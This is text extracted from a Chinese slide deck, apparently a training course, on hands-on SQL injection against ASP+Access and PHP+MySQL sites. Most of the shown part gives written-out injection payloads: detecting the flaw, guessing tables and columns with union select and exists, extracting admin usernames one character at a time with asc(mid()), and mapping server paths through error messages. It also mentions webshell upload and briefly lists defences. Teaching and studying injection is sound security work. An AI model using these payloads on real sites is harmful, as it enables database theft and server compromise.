SQL注入实战+进阶0519资料.pptVIP

二阶SQL注入 第一次输入的语句被正常插入数据库 当用户浏览时执行第一次输入的语句 SQL自动化注入--Sqlmap Sqlmap常用参数说明、演示 防御SQL注入 过滤 转义 参数化查询 Thanks SQL注入是攻击者通过把恶意SQL命令插入到Web表单的输入域或页面请求的查询字符串中，来达到欺骗服务器执行恶意的SQL命令的一种攻击方式。 * Access 无 * ANT指定一个数的反正切值 * ?值的介绍为:0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内, ? ? 2则是必须是Access的模式下,3则是完全开启,连Access中也不支持. * * schema_name table_name column_name * 目标主机系统是Windows 拥有该主机mysql中的某个用户账号，该账号需要有对mysql的insert和delete权限。 mysql5.0，导出路径随意；5.0=mysql5.1，则需要导出至目标服务器的系统目录（如：system32） * * SQL注入实战+进阶 四维创智-Rstar 目录 Asp+Access注入实战 Php+Mysql注入实战 SQL盲注技巧 SQL注入防御 Asp+Access注入实战 Access介绍 Access特性 通过注入获取数据 通过注入执行系统命令 差异备份获取webshell Access简单介绍 是由微软发布的关系数据库管理系统 易学！非计算机专业的人员，也能学会。 Acces特性 猜测性: 在Access中,无法直接获取数据库中的表名和字段名称 不支持T-SQL语法 不支持多语句查询 系统表 MsysAccessObjectsMsysACESMsysObjectsMsysQueriesMsysRelationships 通过注入获取数据—实战 判断注入 页面报错 And 1=1 And 1=2 特定语句判断 ’; 不正常 ’;and (select count(*) from msysobjects)0 正常 猜表名 and exists (select * from 表名) 猜解列名 and exists (select 字段 from 表名) order by N N为自然数 N 大于真实存在的时候页面显示不正常 目的：判断表的列数 union select 1,2,3......from admin 用不同的数字在页面上表示不同的位置 数字是代表表名和字段名的显位的位置的 猜解列长度(2无法查询的时候) and (select top 1 len(列名)from 表名)N 通过注入获取数据—实战 ASCII码分析法猜解字段内容 ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码 and (select top 1 asc(mid(字段,1,1)) from 数据库名)=ASC码(通过转换工具换) 区间判断语句 “......between......and......” AND IIF(ATN(2)0,1,0) BETWEEN 2 AND 0 中文处理法 当ASCII转换后为“负数”使用abs()函数取绝对值 通过注入获取数据—实战 ?ASCII逐字解码法的应用： 猜解表名： and (select count(*) from admin)0 猜解列名： and (select count(列名) from 表名)0 猜解管理员用户个数： and (select count(*) from 表名)=1 猜解管理员用户名的长度： ?and (select len(列名) from 表名)=1 猜解管理员用户名 ?and (select count(*)from 表名where (asc(mid(列名,1,1))) between 30 and 130)0 通过注入获取数据—实战 猜解网站目录 实质：映射本地驱动器 比如：t.asp?id=25 and 1=2 union select * from admin in . 返回的错误： Microsoft JET Database Engine 错Microsoft Jet 数据库引擎打不开文件c:\windows\system32\inetsrv。 它已经被别的用户以独占方式打开，或没有查看数据的权限。 通过注入获取数据—高级实战 再比如：productshow.asp?id=25 and 1=2 union select * from admin in C:\windows\ODBC.ini 返回错误： Microsoft JET Database Engine 错不可识别的数据库格